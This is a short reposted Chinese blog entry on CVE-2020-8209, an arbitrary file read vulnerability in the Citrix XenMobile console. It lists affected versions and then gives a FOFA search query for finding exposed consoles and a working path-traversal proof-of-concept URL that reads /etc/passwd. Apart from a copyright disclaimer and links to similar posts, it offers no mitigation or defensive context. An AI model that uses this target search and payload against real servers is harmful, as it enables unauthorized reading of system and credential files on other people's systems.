(CVE-2020-8209)XenMobile-控制台存在任意文件讀取漏洞 - 碼上快樂

相關內容簡體繁體

(CVE-2020-8209)XenMobile-控制台存在任意文件讀取漏洞

本文轉載自查看原文 2020-11-18 19:53 489 漏洞復現/ 時間 2020

0x01 影響版本

  RP2之前的XenMobile服務器10.12
  RP4之前的XenMobile服務器10.11
  RP6之前的XenMobile服務器10.10
  10.9 RP5之前的XenMobile服務器

0x02 fofa語法

  app="XenMobile-控制台"

應用截圖

0x03 POC

  /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 CVE-2020-3452 CISCO ASA遠程任意文件讀取漏洞【漏洞復現】ThinkAdmin v5和v6 未授權列目錄任意文件讀取(CVE-2020-25540) 【漏洞復現】CVE-2021-36749 Apache Druid LoadData 任意文件讀取漏洞 phpstudy_pro小皮最新版本nginx 默認存在任意文件解析漏洞 Grafana 任意文件讀取漏洞（CVE-2021-43798）學習 Atlassian Confluence任意文件讀取漏洞 Adminer任意文件讀取漏洞復現任意文件讀取與下載漏洞任意文件讀取下載漏洞 WebLogic任意文件上傳漏洞(CVE-2019-2618)

粵ICP備18138465號 © 2018-2025 CODEPRJ.COM